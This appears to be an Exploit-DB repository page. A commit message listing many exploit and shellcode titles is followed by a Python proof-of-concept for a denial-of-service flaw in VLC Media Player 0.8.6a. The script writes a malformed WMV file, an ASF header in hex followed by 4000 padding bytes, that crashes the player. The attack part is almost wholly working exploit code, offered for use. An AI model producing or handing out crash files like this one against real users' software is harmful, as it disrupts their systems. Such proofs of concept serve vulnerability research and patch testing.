880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
60 lines
No EOL
3 KiB
Python
Executable file
60 lines
No EOL
3 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/22003/info
|
|
|
|
VLC Media Player is prone to a denial-of-service vulnerability because it fails to sufficiently handle user-supplied data.
|
|
|
|
Exploiting this issue can allow an attacker to crash the application, effectively denying service to the user.
|
|
|
|
VLC Media Player 0.8.6a is vulnerable; other versions may also be affected.
|
|
|
|
print
|
|
"-----------------------------------------------------------------------"
|
|
print "# VLC media player 0.8.6a Denial of Service"
|
|
print "# url: http://www.videolan.org/"
|
|
print "# author: shinnai"
|
|
print "# mail: shinnai[at]autistici[dot]org"
|
|
print "# site: http://shinnai.altervista.org"
|
|
print "# soundtrack: Lithium (Nirvana)"
|
|
print "# Tested on Windows xp Professional SP2 all patched"
|
|
print "# Special thanks to rgod"
|
|
print
|
|
"-----------------------------------------------------------------------"
|
|
|
|
head = \
|
|
"\x30\x26\xb2\x75\x8e\x66\xcf\x11\xa6\xd9\x00\xaa\x00\x62\xce\x6c"+\
|
|
"\x66\x14\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x02\xa1\xdc"+\
|
|
"\xab\x8c\x47\xa9\xcf\x11\x8e\xe4\x00\xc0\x0c\x20\x53\x65\x68\x00"+\
|
|
"\x00\x00\x00\x00\x00\x00\x88\xb6\x08\x46\x9a\x96\x6e\x45\x8d\xaf"+\
|
|
"\x90\x2c\xd0\xfc\xb6\x18\x52\x01\x1f\x00\x00\x00\x00\x00\x00\x5d"+\
|
|
"\x55\x03\x2e\xce\xc4\x01\x37\x05\x00\x00\x00\x00\x00\x00\xd0\x03"+\
|
|
"\xa1\x08\x00\x00\x00\x00\xf0\x64\x0c\x08\x00\x00\x00\x00\xb8\x0b"+\
|
|
"\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xee\x05\x00\x00\xee\x05"+\
|
|
"\x00\x00\x5e\x6a\x15\x00\xb5\x03\xbf\x5f\x2e\xa9\xcf\x11\x8e\xe3"+\
|
|
"\x00\xc0\x0c\x20\x53\x65\x45\x10\x00\x00\x00\x00\x00\x00\x11\xd2"+\
|
|
"\xd3\xab\xba\xa9\xcf\x11\x8e\xe6\x00\xc0\x0c\x20\x53\x65\x06\x00"+\
|
|
"\x17\x10\x00\x00\xa9\x46\x43\x7c\xe0\xef\xfc\x4b\xb2\x29\x39\x3e"+\
|
|
"\xde\x41\x5c\x85\x21\x00\x00\x00\x00\x00\x00\x00\x01\x00\x06\x66"+\
|
|
"\x00\x72\x00\x00\x00\x5d\x8b\xf1\x26\x84\x45\xec\x47\x9f\x5f\x0e"+\
|
|
"\x65\x1f\x04\x52\xc9\x1a\x00\x00\x00\x00\x00\x00\x00\x02\x01\xea"+\
|
|
"\xcb\xf8\xc5\xaf\x5b\x77\x48\x84\x67\xaa\x8c\x44\xfa\x4c\xca\x5a"+\
|
|
"\x01\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x01\x00\x0c\x00\x02"+\
|
|
"\x00\x02\x00\x00\x00\x49\x00\x73\x00\x56\x00\x42\x00\x52\x00\x00"+\
|
|
"\x00\x00\x00\x00\x00\x01\x00\x34\x00\x00\x00\x06\x00\x00\x00\x44"+\
|
|
"\x00\x65\x00\x76\x00\x69\x00\x63\x00\x65\x00\x43\x00\x6f\x00\x6e"+\
|
|
"\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6e\x00\x63\x00\x65"+\
|
|
"\x00\x54\x00\x65\x00\x6d\x00\x70\x00\x6c\x00\x61\x00\x74\x00\x65"+\
|
|
"\x00\x00\x00\x4c\x00\x31\x00\x00\x00\x00\x00\x02\x00\x0c\x00\x02"+\
|
|
"\x00\x02\x00\x00\x00\x49\x00\x73\x00\x56\x00\x42\x00\x52\x00\x00"+\
|
|
"\x00\x01\x00\x00\x00\x02\x00\x34\x00\x00\x00\x04\x00\x00\x00\x44"+\
|
|
"\x00\x65\x00\x76\x00\x69\x00\x63\x00\x65\x00\x43\x00\x6f\x00\x6e"+\
|
|
"\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6e\x00\x63\x00\x65"+\
|
|
"\x00\x54\x00\x65\x00\x6d\x00\x70\x00\x6c\x00\x61\x00\x74\x00\x65"+\
|
|
"\x00\x00\x00\x40\x00\x00\x00\x00\x00\x01\x00\x2e\x00\x03\x00\x04"+\
|
|
"\x00\x00\x00"
|
|
|
|
buff = "A" * 4000
|
|
|
|
VLCFile = head + buff
|
|
|
|
fileOut = open('videolan.wmv','wb')
|
|
fileOut.write(VLCFile)
|
|
fileOut.close() |